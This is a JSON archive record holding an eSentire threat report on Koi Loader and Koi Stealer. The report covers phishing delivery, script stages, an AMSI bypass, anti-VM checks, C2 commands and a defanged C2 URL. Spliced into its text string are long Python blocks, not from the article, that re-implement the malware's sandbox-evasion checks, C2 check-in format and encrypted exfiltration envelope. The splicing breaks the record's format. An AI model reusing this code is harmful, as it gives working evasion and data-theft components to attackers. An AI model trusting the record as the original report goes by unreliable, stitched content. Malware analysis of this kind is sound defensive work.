{
	"id": "560739f3-3ee3-4c46-8c0a-850ddaef62f0",
	"created_at": "2026-04-06T00:20:18.971601Z",
	"updated_at": "2026-04-10T03:20:31.908762Z",
	"deleted_at": null,
	"sha1_hash": "a508a3e674458047eccf4212b8fe348bc5b50a1a",
	"title": "Unraveling Not AZORult but Koi Loader: A Precursor to Koi Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5452656,
	"plain_text": "Unraveling Not AZORult but Koi Loader: A Precursor to Koi\r\nStealer\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 16:43:37 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nAt the end of March 2024, the eSentire Threat Response Unit (TRU) detected an infection by a stealer malware\r\nthat some researchers were tracking as AZORult.\r\nAZORult is an infostealer malware first discovered in 2016. Sales of AZORult stopped at the end of 2018, when the\r\nseller announced the end of the project (translated from Russian): \"Every piece of software has its\r\nlifespan. And for AZORult, it has come to an end. With both sadness and joy, I announce that sales are closed\r\nforever\" (Figure 1).\r\nFigure 1: CrydBrox announcement on closing the AZORult sales\r\nIn early 2019, Kaspersky unveiled details indicating that AZORult had been rewritten from Delphi to C++. Fast-forward to the beginning of 2024: Cyble and Netskope reported on yet another resurgence of AZORult, this time\r\nwith the code rewritten in .NET. 
However, a detailed comparison of Netskope’s, Cyble's, and\r\nKaspersky's samples showed no code overlaps.\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 1 of 16\n\nThreat Researcher Ernesto Fernández from Trellix highlighted an article that identifies the malware as Koi\r\nLoader and Koi Stealer, reflecting the analyses by Cyble and Netskope. These findings, including the Twitter post\r\nfrom Unit42 and discussions with a Principal Threat Researcher at Palo Alto, have led us to adopt the terms\r\nKoi Loader and Koi Stealer for this article's discussion.\r\nInitial Infection\r\nThe user received a phishing email about an unauthorized transaction on the sender's debit card, containing an\r\nembedded link (Figure 2). This link directed the user to download a malicious ZIP archive named\r\n“chasebank_statement_mar.zip” (MD5: 8751223ced55a2079e876b893917a0f3). Notably, the hash of the\r\narchive changes with each new download.\r\nFigure 2: Phishing email\r\nAs seen in Figure 3, we found multiple reports about the sender’s email address on spam[.]org, with subject lines such\r\nas:\r\nConcerned about an ambiguous charge on my bank statement - seeking your help\r\nNeed your guidance with a puzzling payment on my credit card - could you advise\r\nUneasy about an unknown charge on my bank statement connected to your store - could you assist\r\nUnforeseen payment on my debit card linked to your website - looking for your guidance\r\nConcerned about an unforeseen charge on my account - appreciate your assistance\r\nFigure 3: Complaint report on spam[.]org\r\nUpon visiting the embedded malicious page, which is hosted on Google Sites, we received a CAPTCHA prompt\r\n(Figure 4).\r\nFigure 4: CAPTCHA page on Google Sites\r\nIt’s worth noting that to receive the payload, the user would have to pass the 
CAPTCHA prompt first. If the user\r\nfails the CAPTCHA prompt, the server responds with a “NO” status (Figure 5).\r\nFigure 5: Response from the server if the CAPTCHA prompt fails\r\nIf the user passes the CAPTCHA prompt, the server responds with a “YES” status and serves the ZIP archive.\r\nFigure 6: Response from the server if the CAPTCHA prompt is passed\r\nThe ZIP archive includes a shortcut file (.lnk) named “chasebank_statement_mar.lnk” (MD5:\r\n044fd3c4d97a35f80792b7edee445c48), which downloads the next-stage payload,\r\n“m8hHxtkVLYPw.bat” (MD5: 099259c6d898c5d91dc3b01756e349d8), from the server using curl.\r\nThis file is stored in the %TEMP% folder. Additionally, the shortcut establishes persistence on the system by creating a\r\nScheduled Task named “0BAduEnQZG9POyK” (Figure 7).\r\nFigure 7: Contents of the shortcut file\r\nKoi payloads are usually all hosted in the same open directory, as shown in Figure 8.\r\nFigure 8: Example of the opendir hosting Koi payloads\r\nThe downloaded batch file “m8hHxtkVLYPw.bat” contains the PowerShell command (Figure 9) that is responsible\r\nfor fetching another payload from the server, “WLXUL6LWXQPB.js” (MD5:\r\n48c7fd278ac590c9bd896ad9c7850c3a).\r\nFigure 9: Contents of the batch script\r\nThe downloaded JavaScript file first makes a persistent copy of itself: the script checks whether its current filename is\r\nagent.js and, if not, attempts to copy itself to the %programdata% directory as agent.js. It then defines a\r\nmutex name, “7z2LKLJ62LPA”, and attempts to delete any file with that name in the %temp% directory. 
If a file\r\nwith the mutex name does not exist (indicating that another instance may not be running), it proceeds to retrieve\r\nand execute additional payloads via PowerShell commands, as shown in Figure 10.\r\nFigure 10: Contents of the JavaScript file\r\nThe PowerShell script agent1.ps1 (MD5: 96b251e61f987648f69767f398324652) contains a one-liner command\r\nthat is responsible for the AMSI bypass shown in Figure 11.\r\nFigure 11: AMSI bypass\r\nagent3.ps1 (MD5: a3ee8655f45c72f5231ded7a4a1c7e43) contains the instructions to download the native Koi Loader\r\nbinary and to run the shellcode in a separate thread alongside the loader. The shellcode is responsible for\r\nallocating memory for the loader and jumping to the loader’s entry point (Figure 12).\r\nFigure 12: Shellcode that is responsible for accessing the loader at the entry point\r\nKoi Loader\r\nAnti-VM\r\nThe Koi Loader malware is written in C. The final loader payload is extracted from the resource section and decrypted\r\nwith XOR; the XOR key is stored in the resource section as well.\r\nWe will proceed with the decrypted Koi Loader payload. The loader begins with its anti-CIS feature, which\r\nterminates the process if any of the languages listed in Figure 13 are detected.\r\nFigure 13: Anti-CIS / language check\r\nAdditionally, the loader employs anti-VM capabilities. It uses EnumDisplayDevicesW to enumerate the display\r\ndevices attached to the desktop, searching for device strings that match known virtual machine display adapters\r\n(Hyper-V, VMware, Parallels, Red Hat QXL). 
It then checks for specific files related to VirtualBox\r\n(VBoxService.exe and VBoxTray.exe), whose presence indicates that the system is running inside a VirtualBox VM.\r\nThe loader further inspects certain directories and files for evidence of a VM environment. This includes looking\r\nfor specific files in the user's system and application data folders that may indicate automated testing or\r\nsandboxing environments, such as Recently.docx, Opened.docx, These.docx, Resource.txt and OpenVPN.txt (Figure\r\n14).\r\nFigure 14: VirtualBox and file checks\r\nNext, the loader retrieves the computer name and the name of the currently logged-in user and compares them against\r\nthe computer names WILLCARTER-PC, FORTI-PC and SFTOR-PC and the usernames Joe Cage, STRAZNJICA.GRUBUTT, Paul Jones, PJones, Harry Johnson,\r\nWDAGUtilityAccount, sal.rosenburg and d5.vc/g. These computer names and usernames are\r\nindicative of automated analysis environments or of generic accounts commonly used in virtual machines.\r\nGlobalMemoryStatusEx is called to retrieve the system's memory status. The loader checks whether the total physical memory is greater\r\nthan or equal to 3050 MB. This check is performed to determine whether the system might be a VM rather than a typical\r\nend-user device, as analysis environments often allocate less memory to each VM instance.\r\nInterestingly, Koi Loader also checks files with extensions such as doc, docx, xls and xlsx. It verifies whether\r\nthese files are exactly 15 bytes in size and whether their filenames contain 30 characters. 
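The host checks described in this section, including the document-count and powershell.exe path condition that follows, re-implemented as an added example (not code from the article or from Koi Loader). It evaluates a host profile the way the loader does, so a sandbox operator can feed in what an analysis image would report and see which checks would make the loader bail. The adapter strings, file names, account names and thresholds are the ones reported above; the HostProfile layout, the case-insensitive substring matching, the reading of a 30-character filename as including the extension, and the two sample profiles are assumptions.

```python
# Added example (not from the eSentire article or from the malware): re-creates
# the Koi Loader host checks described above as pure functions over a host
# profile, so a sandbox image can be tested against them offline. Value lists
# and thresholds are those reported in the article; the profile layout, the
# case-insensitive substring matching and the sample profiles are assumptions.
from dataclasses import dataclass, field

VM_DISPLAY_ADAPTERS = ('hyper-v', 'vmware', 'parallels', 'red hat qxl')
VBOX_FILES = ('vboxservice.exe', 'vboxtray.exe')
SANDBOX_MARKER_FILES = ('recently.docx', 'opened.docx', 'these.docx',
                        'resource.txt', 'openvpn.txt')
SANDBOX_COMPUTER_NAMES = ('willcarter-pc', 'forti-pc', 'sftor-pc')
SANDBOX_USERNAMES = ('joe cage', 'straznjica.grubutt', 'paul jones', 'pjones',
                     'harry johnson', 'wdagutilityaccount', 'sal.rosenburg',
                     'd5.vc/g')
MIN_PHYSICAL_MB = 3050           # GlobalMemoryStatusEx threshold
DOC_EXTENSIONS = ('.doc', '.docx', '.xls', '.xlsx')
DECOY_SIZE, DECOY_NAME_LEN, MAX_DECOYS = 15, 30, 20


@dataclass
class HostProfile:
    display_devices: list          # strings as EnumDisplayDevicesW would return them
    present_files: list            # file names seen in the system/app-data folders
    computer_name: str
    user_name: str
    total_physical_mb: int
    documents: list = field(default_factory=list)   # (file name, size in bytes)
    executable_path: str = ''      # image path of the process running the loader


def _lower(items):
    return [i.lower() for i in items]


def vm_display_adapter(p):
    return any(a in d for d in _lower(p.display_devices) for a in VM_DISPLAY_ADAPTERS)


def virtualbox_files(p):
    return any(f in _lower(p.present_files) for f in VBOX_FILES)


def sandbox_marker_files(p):
    return any(f in _lower(p.present_files) for f in SANDBOX_MARKER_FILES)


def sandbox_computer_name(p):
    return p.computer_name.lower() in SANDBOX_COMPUTER_NAMES


def sandbox_user_name(p):
    return p.user_name.lower() in SANDBOX_USERNAMES


def low_memory(p):
    # the loader only continues when total physical memory is >= 3050 MB
    return p.total_physical_mb < MIN_PHYSICAL_MB


def decoy_documents(p):
    # ASSUMPTION: a 30-character filename, extension included. As described,
    # at most 20 such files together with a powershell.exe image path is
    # treated as an analysis environment.
    decoys = [n for n, size in p.documents
              if n.lower().endswith(DOC_EXTENSIONS)
              and size == DECOY_SIZE and len(n) == DECOY_NAME_LEN]
    return len(decoys) <= MAX_DECOYS and 'powershell.exe' in p.executable_path.lower()


CHECKS = (vm_display_adapter, virtualbox_files, sandbox_marker_files,
          sandbox_computer_name, sandbox_user_name, low_memory, decoy_documents)


def failed_checks(p):
    # names of the checks that would make the loader terminate on this host
    return [c.__name__ for c in CHECKS if c(p)]


# constructed sample profiles
SANDBOX = HostProfile(
    display_devices=['VMware SVGA 3D'],
    present_files=['VBoxTray.exe', 'OpenVPN.txt'],
    computer_name='FORTI-PC',
    user_name='Paul Jones',
    total_physical_mb=2048,
    documents=[('a' * 25 + '.docx', 15)],
    executable_path='C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
)
WORKSTATION = HostProfile(
    display_devices=['NVIDIA GeForce RTX 3060'],
    present_files=['desktop.ini'],
    computer_name='DESKTOP-7Q2K9LM',
    user_name='jsmith',
    total_physical_mb=16384,
    documents=[('budget_2024.xlsx', 48211)],
    executable_path='C:/Users/jsmith/AppData/Local/Temp/update.exe',
)

if __name__ == '__main__':
    for name, prof in (('sandbox', SANDBOX), ('workstation', WORKSTATION)):
        print(name, failed_checks(prof))
```

Note that, as the article describes it, the document check fires on any host that runs the loader from a PowerShell image path and has at most 20 decoy-looking documents, so a clean workstation that launches the loader under powershell.exe also trips it; the test below covers that corner.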
Additionally, it assesses\r\nwhether the total number of files matching these criteria is 20 or fewer, and if so, it proceeds with another\r\ncheck for the presence of powershell.exe in the process's executable path.\r\nIf all these conditions are met, the loader interprets this as a sign that it might be running in a controlled or analysis\r\nenvironment (Figure 15).\r\nFigure 15: File size and filename character check\r\nThe loader creates a mutex to avoid re-infection. The mutex name is derived from the\r\nVolume Serial Number combined with other constants in the code. The reproduced algorithm is shown in Figure 16.\r\nFigure 16: Mutex generation algorithm\r\nAdditional Analysis\r\nNext, the loader sets the file attributes of the previously mentioned agent.js to hidden via\r\nSetFileAttributesW and creates a scheduled task named “Firefox Default Browser Agent\r\n458046B0AF4A39CB” via the ITaskScheduler interface, which runs the agent.js file via wscript.exe.\r\nCommand and Control\r\nFor the initial check-in, Koi Loader sends the following to the C2 (example):\r\n101|{GUID}|VoYGkc5R|pNL/LwrBZb5hBXeAiJ9/lLRrL0U4usTuqV2bGDMIRig=\r\nwhere “VoYGkc5R” is a hardcoded marker, followed by a randomly generated Base64-encoded string (Figure\r\n17).\r\nFigure 17: Initial check-in with C2\r\nAfter the initial check-in, the infected machine sends another request containing the information gathered from the\r\nmachine, including OSMajorVersion, OSMinorVersion, OSBuildNumber, Username, ComputerName and the\r\ndomain name if present. 
The collected information is then XOR'ed with a key generated from a randomly generated 16-character value\r\nby a modified MD5 algorithm, and the result is sent over to the C2.\r\nThe modification to MD5 is that a fixed byte sequence is prepended to the input data\r\nbefore hashing, so the resulting key differs from a standard MD5 hash of the 16-character value alone.\r\nThe secondary POST request format:\r\n111|{GUID}|{XOR’ed host information}\r\nFigure 18: Secondary POST request with the host information\r\nNext, the loader checks whether the .NET Framework 2.0.50727 compiler exists on the infected host and, if it\r\ndoes, downloads and executes the “sd2.ps1” (MD5: 4f55be0b55ec67dfda42b88e9c743a2a) script from the server\r\nvia PowerShell.\r\nIf the .NET 2.0 compiler does not exist, it then checks for the presence of the .NET Framework 4.0.30319 compiler.\r\nIf this exists, the loader downloads the \"sd4.ps1\" (MD5: 607b42bd61902ad5a5ea9f508e18a5a4) script\r\ninstead (Figure 19).\r\nFigure 19: Retrieving sd4.ps1 or sd2.ps1 scripts based on .NET Framework versions\r\nWe will analyze the \"sd2.ps1\" and \"sd4.ps1\" payloads later in this article. Now, let's return to the command-and-control part.\r\nIf the host receives the \"INIT\" response from the server, it resubmits the check-in to the server, as illustrated in\r\nFigure 17, appending the GUID value and a Base64-encoded string to the POST request. 
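The two check-in messages described above, reconstructed as an added example (not code from the article or from the malware) so that the format can be generated and decoded offline, for instance to decode a captured 111 request once the 16-character value is known. The message types 101 and 111, the VoYGkc5R marker, the 32-byte random blob (the Base64 sample above decodes to 32 bytes), the 16-character value and the MD5 customization come from the article; the fixed prefix bytes (PREFIX, a placeholder), the layout of the serialized host information, the use of the 16-byte digest as a repeating XOR key and the GUID formatting are assumptions, as is the premise that the decoding side already knows the 16-character value (the article does not say how the C2 learns it).

```python
# Added example (not from the eSentire article or from Koi Loader): builds and
# decodes the 101 and 111 check-in messages described above. Message types,
# the marker and the 16-character seed are as reported; PREFIX (placeholder),
# the '|'-joined host information layout, the repeating 16-byte XOR key and
# the GUID formatting are assumptions. Sample host data is constructed.
import base64
import hashlib
import os
import secrets
import string
import uuid

MARKER = 'VoYGkc5R'
PREFIX = bytes.fromhex('4b4f49')     # ASSUMPTION: placeholder for the fixed prefix
HOST_FIELDS = ('OSMajorVersion', 'OSMinorVersion', 'OSBuildNumber',
               'Username', 'ComputerName', 'Domain')


def new_guid():
    return '{' + str(uuid.uuid4()).upper() + '}'


def build_initial_checkin(guid):
    # 101|{GUID}|marker|base64(32 random bytes)
    return f'101|{guid}|{MARKER}|' + base64.b64encode(os.urandom(32)).decode()


def random_seed():
    alphabet = string.ascii_letters + string.digits
    return ''.join(secrets.choice(alphabet) for _ in range(16))


def derive_xor_key(seed):
    # 'modified MD5': a fixed byte sequence is prepended before hashing
    return hashlib.md5(PREFIX + seed.encode()).digest()


def xor_bytes(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def serialize_host_info(info):
    return '|'.join(str(info.get(f, '')) for f in HOST_FIELDS).encode()


def build_host_report(guid, info, seed):
    # 111|{GUID}|{XOR'ed host information}
    enc = xor_bytes(serialize_host_info(info), derive_xor_key(seed))
    return b'111|' + guid.encode() + b'|' + enc


def parse_host_report(body, seed):
    # decoding side: split only on the first two separators, since the
    # XOR'ed payload may itself contain 0x7c bytes
    msg_type, guid, enc = body.split(b'|', 2)
    if msg_type != b'111':
        raise ValueError('not a host report: ' + msg_type.decode(errors='replace'))
    plain = xor_bytes(enc, derive_xor_key(seed)).decode()
    return guid.decode(), dict(zip(HOST_FIELDS, plain.split('|')))


# constructed sample host
SAMPLE_HOST = {'OSMajorVersion': 10, 'OSMinorVersion': 0, 'OSBuildNumber': 19045,
               'Username': 'jsmith', 'ComputerName': 'DESKTOP-7Q2K9LM',
               'Domain': 'CORP'}

if __name__ == '__main__':
    guid, seed = new_guid(), random_seed()
    print(build_initial_checkin(guid))
    report = build_host_report(guid, SAMPLE_HOST, seed)
    print(report[:60])
    print(parse_host_report(report, seed))
```

A detection written against this traffic should key on the fixed structure (a three-digit type, a braced GUID and, for type 101, the literal marker) rather than on the XOR'ed tail, which changes with every seed.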
Otherwise, the host waits\r\nfor additional tasks from the C2 server, with a one-minute sleep interval between each connection.\r\nThe list of commands/tasks is shown below:\r\nCommand - Description\r\n0x67 - Executes scripts/commands via Command Prompt\r\n0x68 - Executes scripts/commands via PowerShell\r\n0x69 - Enables the system shutdown privilege for the running process and performs the shutdown\r\n0x6A - Creates a scheduled task to run agent.js and removes agent.js if present on the host\r\n0x6C - Establishes communication with a C2 server\r\n0x6E - Performs process injection into either explorer.exe or certutil.exe based on the subsystem value\r\n(if the subsystem is Console User Interface, the payload is injected into certutil.exe; if it is\r\nGraphical User Interface, the payload is injected into explorer.exe), or writes the payload to the\r\n%TEMP% folder and executes it directly (the payload's file name is generated\r\nwith a PRNG)\r\n0x70 - Dynamically loads and executes a function from a DLL; in our sample, the export function is\r\n“Release”\r\nKoi Stealer\r\nThe retrieved scripts “sd2.ps1” and “sd4.ps1” include code for decrypting the final Koi Stealer binary using XOR,\r\nas well as for executing the binary with the “config” parameters received from the C2 server.\r\nThe XOR key is obtained from the C2 server at the URL hxxp://91.202.233[.]209/index.php?\r\nid=$guid\u0026subid=px8eIkut, where $guid represents the GUID of the infected machine (refer to Figure 20).\r\nFigure 20: Snippet of “sd2.ps1” and “sd4.ps1” scripts\r\nIt's worth noting that the decrypted Koi Stealer payload exhibits anti-VM capabilities similar to those previously\r\ndescribed for the loader (see Figure 21).\r\nFigure 21: Anti-VM capabilities (Final Koi 
Stealer)\r\nKoi Stealer copies sensitive data, including cookies, history and login information, to the %AppData% folder. For\r\neach copied file, it generates a unique GUID as the file name. The files are deleted immediately after\r\ntheir contents have been fully processed (Figure 22).\r\nFigure 22: Removing the copied files after processing\r\nYou can access the list of collected data for exfiltration on GitHub.\r\nIn the loader component, the program searches for the distinct identifier \"LDR\", retrieves commands from the C2\r\nserver, decodes them from Base64 and decrypts them using XOR with a shared secret as the key.\r\nSubsequently, the secondary payload is downloaded from a URL provided by the C2 server and executed. Messages\r\nfor successful or failed execution are logged in the errors.txt file and sent over to the C2 (Figure 23).\r\nFigure 23: Logged messages\r\nKoi Stealer collects the build ID of the payload (in our case the second position of the previously mentioned\r\n“config”, which is “px8eIkut”), basic system information such as PC name, current username, GUID, GPU and\r\nCPU information, total visible RAM size, screen resolution, system configuration (system language, architecture,\r\noperating system), security software and installed applications, and saves them to system.txt.\r\nThe infostealer generates a private-public key pair and a shared secret using the Curve25519 algorithm, then\r\ncompresses the harvested data using GZip and encrypts it with XOR, employing the shared secret as the\r\nencryption key. 
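The exfiltration envelope described in this section (Curve25519 key agreement, GZip, XOR with the shared secret, and a POST body made of the public key, a 0x4b delimiter and the ciphertext), reconstructed as an added example that is neither the stealer's code nor code from the article. It carries a pure-Python X25519 (the RFC 7748 Montgomery ladder) so it runs offline, and includes the decoding side a C2 would use, which is also the decryptor an analyst needs once the C2 private key is recovered. Assumed, because the article does not say: the C2 public key is embedded in the stealer, the raw 32-byte shared secret is applied as a repeating XOR key, and the sample system.txt content is constructed.

```python
# Added example (not from the eSentire article or from Koi Stealer): models
# the exfiltration envelope described above. X25519 is implemented inline
# from RFC 7748 so no third-party library is needed. Assumptions: the C2
# public key is embedded in the stealer, the raw 32-byte shared secret is the
# repeating XOR key, and the harvested sample data is constructed.
import gzip
import os

P = 2**255 - 19
A24 = 121665
BASE_POINT = (9).to_bytes(32, 'little')
DELIM = bytes([0x4b])


def _clamp(scalar):
    k = bytearray(scalar)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, 'little')


def x25519(scalar, point):
    # RFC 7748 section 5 Montgomery ladder (no constant-time hardening)
    k = _clamp(scalar)
    u = bytearray(point)
    u[31] &= 127
    x1 = int.from_bytes(u, 'little') % P
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) ** 2 % P
        z3 = x1 * ((da - cb) ** 2) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, 'little')


def keypair(secret=None):
    secret = secret or os.urandom(32)
    return secret, x25519(secret, BASE_POINT)


def xor_stream(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_exfil_body(c2_public, victim_secret, harvested):
    # stealer side: shared = X25519(victim_secret, c2_public);
    # body = victim_public || 0x4b || XOR(gzip(data), shared)
    shared = x25519(victim_secret, c2_public)
    victim_public = x25519(victim_secret, BASE_POINT)
    return victim_public + DELIM + xor_stream(gzip.compress(harvested), shared)


def decode_exfil_body(c2_secret, body):
    # C2 side, or an analyst holding the C2 private key: reverse the envelope
    if len(body) < 34 or body[32:33] != DELIM:
        raise ValueError('malformed envelope')
    victim_public, ciphertext = body[:32], body[33:]
    shared = x25519(c2_secret, victim_public)
    return gzip.decompress(xor_stream(ciphertext, shared))


# constructed sample of what system.txt might hold
SAMPLE_SYSTEM_TXT = b'build=px8eIkut;pc=DESKTOP-7Q2K9LM;user=jsmith;ram=16384'

if __name__ == '__main__':
    c2_secret, c2_public = keypair()
    victim_secret, _ = keypair()
    body = build_exfil_body(c2_public, victim_secret, SAMPLE_SYSTEM_TXT)
    print(len(body), body[:32].hex(), body[32])
    print(decode_exfil_body(c2_secret, body) == SAMPLE_SYSTEM_TXT)
```

Because the victim's public key travels in the clear and the ciphertext is XOR of a GZip stream, the first bytes after the 0x4b delimiter are the GZip header (1f 8b 08) XOR'ed with the start of the shared secret; a network detection cannot recover the key from that, but it does make the 32-byte-prefix-plus-0x4b layout a stable fingerprint of this envelope.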
Subsequently, it sends the data to the C2 server, with the POST request beginning with the public\r\nkey, followed by a 0x4b delimiter, and then the encrypted, compressed data (Figure 24).\r\nFigure 24: Transmitted data\r\nWhat can you learn from this TRU Positive?\r\nPhishing emails remain a key vector for malware distribution, demonstrating the continuous threat of social\r\nengineering attacks and the need for ongoing vigilance.\r\nThe use of anti-VM capabilities by malware like Koi Loader and Koi Stealer highlights the attempts\r\nof modern threats to evade analysis and detection by analysts and researchers.\r\nThe case emphasizes the necessity of multi-layered security measures, including up-to-date antivirus or\r\nEndpoint Detection and Response (EDR) tools, to detect and block malicious activities.\r\nImplementing Phishing and Security Awareness Training (PSAT) programs is crucial to educate employees\r\nabout emerging threats and mitigate the risk of successful social engineering attacks.\r\nThe use of obfuscation and sophisticated delivery mechanisms by malware underscores the importance of\r\nimplementing comprehensive detection strategies, including script logging and behavior-based detection\r\nmechanisms, to identify and mitigate threats.\r\nWhat did we do?\r\nOur 24/7 SOC Cyber Analysts investigated the suspicious activities, notified the customer, and isolated the\r\naffected device.\r\nRecommendations from our Threat Response Unit (TRU) Team:\r\nEnsure that all endpoints are protected with up-to-date antivirus software or an Endpoint Detection and\r\nResponse (EDR) tool capable of detecting and blocking malicious files.\r\nImplement a Phishing and Security Awareness Training (PSAT) program that educates and informs your\r\nemployees on emerging threats in the threat landscape.\r\nWe recommend modifying the default 'open-with' 
settings for script files, ensuring they open with a basic\r\ntext editor like Notepad instead of executing.\r\nMonitor unusual network traffic patterns, such as the specific user-agent strings and request formats used by\r\nmalware to communicate with Command and Control (C2) servers, to identify potential compromises.\r\nDetection Rules\r\nYou can access the detection rules via the links listed under References.\r\nIndicators of Compromise\r\nYou can access the indicators of compromise via the links listed under References.\r\nReferences\r\nhttps://securelist.com/azorult-analysis-history/89922/\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nhttps://twitter.com/Unit42_Intel/status/1775891118963503288\r\nhttps://x.com/RussianPanda9xx/...\r\nhttps://www.netskope.com/blog/...\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nhttps://github.com/RussianPanda95/Yara-Rules/tree/main/Koi\r\nhttps://github.com/esThreatIntelligence/iocs/blob/main/Koi/iocs_4-4-2024.txt\r\nhttps://github.com/esThreatIntelligence/iocs/blob/main/Koi/data_collected.txt\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. 
TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer"
	],
	"report_names": [
		"unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434818,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a508a3e674458047eccf4212b8fe348bc5b50a1a.pdf",
		"text": "https://archive.orkl.eu/a508a3e674458047eccf4212b8fe348bc5b50a1a.txt",
		"img": "https://archive.orkl.eu/a508a3e674458047eccf4212b8fe348bc5b50a1a.jpg"
	}
}